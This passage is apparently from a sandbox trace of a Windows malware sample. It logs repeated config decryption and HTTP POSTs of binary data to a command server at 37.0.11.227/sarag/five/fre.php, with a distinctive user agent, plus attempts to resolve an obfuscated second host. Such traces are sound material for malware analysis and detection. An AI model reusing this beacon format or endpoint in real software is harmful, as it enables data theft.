phKey=0x19fcac*=0x69d5e8) returned 1 [0217.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.750] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.755] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.756] GetProcessHeap () returned 0x690000 [0217.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0217.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.758] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0217.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.766] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.768] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0217.768] GetProcessHeap () returned 0x690000 [0217.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.770] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0217.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.772] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0217.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.775] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0217.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.777] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0217.777] GetProcessHeap () returned 0x690000 [0217.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0217.777] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0217.777] GetProcessHeap () returned 0x690000 [0217.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0217.777] socket (af=2, type=1, protocol=6) returned 0x550 [0217.778] connect (s=0x550, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0217.840] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0217.840] GetProcessHeap () returned 0x690000 [0217.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0217.840] GetProcessHeap () returned 0x690000 [0217.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0217.842] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.854] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.854] GetProcessHeap () returned 0x690000 [0217.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0217.861] GetProcessHeap () returned 0x690000 [0217.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.862] GetProcessHeap () returned 0x690000 [0217.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0217.862] GetProcessHeap () returned 0x690000 [0217.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0217.865] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.873] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.874] GetProcessHeap () returned 0x690000 [0217.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0217.874] GetProcessHeap () returned 0x690000 [0217.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.875] send (s=0x550, buf=0x6ab500*, len=242, flags=0) returned 242 [0217.880] send (s=0x550, buf=0x6aba40*, len=159, flags=0) returned 159 [0217.880] GetProcessHeap () returned 0x690000 [0217.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0217.880] recv (in: s=0x550, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0217.993] GetProcessHeap () returned 0x690000 [0218.004] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0218.007] GetProcessHeap () returned 0x690000 [0218.009] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0218.009] GetProcessHeap () returned 0x690000 [0218.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0218.012] GetProcessHeap () returned 0x690000 [0218.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0218.015] closesocket (s=0x550) returned 0 [0218.015] GetProcessHeap () returned 0x690000 [0218.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0218.016] GetProcessHeap () returned 0x690000 [0218.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0218.021] GetProcessHeap () returned 0x690000 [0218.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0218.022] GetProcessHeap () returned 0x690000 [0218.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0218.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd08) returned 0x550 [0218.027] Sleep (dwMilliseconds=0xea60) [0218.039] GetProcessHeap () returned 0x690000 [0218.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0218.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.041] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.056] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0218.068] GetProcessHeap () returned 0x690000 [0218.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0218.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.072] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0218.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.074] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.076] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.076] GetProcessHeap () returned 0x690000 [0218.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0218.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.078] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0218.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.080] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0218.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.081] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0218.081] GetProcessHeap () returned 0x690000 [0218.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0218.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0218.088] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0218.089] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0218.339] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0218.341] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.341] GetProcessHeap () returned 0x690000 [0218.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0218.341] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0218.342] GetProcessHeap () returned 0x690000 [0218.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0218.342] GetProcessHeap () returned 0x690000 [0218.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0218.343] GetProcessHeap () returned 0x690000 [0218.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0218.343] GetProcessHeap () returned 0x690000 [0218.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0218.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0218.878] GetProcessHeap () returned 0x690000 [0218.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0218.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.881] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0218.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.886] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.888] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.888] GetProcessHeap () returned 0x690000 [0218.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0218.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.947] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0218.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.951] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0218.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0218.983] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0218.983] GetProcessHeap () returned 0x690000 [0218.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0218.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0219.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.052] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0219.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0219.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.055] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0219.055] GetProcessHeap () returned 0x690000 [0219.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0219.055] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0219.055] GetProcessHeap () returned 0x690000 [0219.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0219.055] socket (af=2, type=1, protocol=6) returned 0x554 [0219.055] connect (s=0x554, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0219.097] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0219.097] GetProcessHeap () returned 0x690000 [0219.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0219.097] GetProcessHeap () returned 0x690000 [0219.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0219.098] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0219.099] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0219.099] GetProcessHeap () returned 0x690000 [0219.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0219.100] GetProcessHeap () returned 0x690000 [0219.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0219.100] GetProcessHeap () returned 0x690000 [0219.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0219.100] GetProcessHeap () returned 0x690000 [0219.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0219.101] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0219.102] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0219.102] GetProcessHeap () returned 0x690000 [0219.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0219.103] GetProcessHeap () returned 0x690000 [0219.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0219.103] send (s=0x554, buf=0x6ab500*, len=242, flags=0) returned 242 [0219.104] send (s=0x554, buf=0x6aba40*, len=159, flags=0) returned 159 [0219.104] GetProcessHeap () returned 0x690000 [0219.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0219.104] recv (in: s=0x554, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0219.202] GetProcessHeap () returned 0x690000 [0219.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0219.210] GetProcessHeap () returned 0x690000 [0219.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0219.210] GetProcessHeap () returned 0x690000 [0219.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0219.211] GetProcessHeap () returned 0x690000 [0219.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0219.211] closesocket (s=0x554) returned 0 [0219.212] GetProcessHeap () returned 0x690000 [0219.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0219.212] GetProcessHeap () returned 0x690000 [0219.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0219.212] GetProcessHeap () returned 0x690000 [0219.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0219.213] GetProcessHeap () returned 0x690000 [0219.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0219.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcd8) returned 0x554 [0219.216] Sleep (dwMilliseconds=0xea60) [0219.222] GetProcessHeap () returned 0x690000 [0219.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0219.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.223] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.287] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0219.870] GetProcessHeap () returned 0x690000 [0219.871] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0219.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.872] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0219.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.875] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.876] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.876] GetProcessHeap () returned 0x690000 [0219.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0219.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.880] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0219.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.883] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0219.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.884] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0219.885] GetProcessHeap () returned 0x690000 [0219.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0219.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.887] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.889] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.908] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.910] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.910] GetProcessHeap () returned 0x690000 [0219.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0219.910] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0219.910] GetProcessHeap () returned 0x690000 [0219.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0219.911] GetProcessHeap () returned 0x690000 [0219.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0219.912] GetProcessHeap () returned 0x690000 [0219.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0219.912] GetProcessHeap () returned 0x690000 [0219.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0219.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.968] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0219.975] GetProcessHeap () returned 0x690000 [0219.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0219.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.976] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0219.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.978] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0219.993] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.993] GetProcessHeap () returned 0x690000 [0219.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0220.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.041] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0220.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.043] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0220.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0220.044] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0220.044] GetProcessHeap () returned 0x690000 [0220.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0220.045] LoadLibraryW (lpLibFileName="shlwapi") 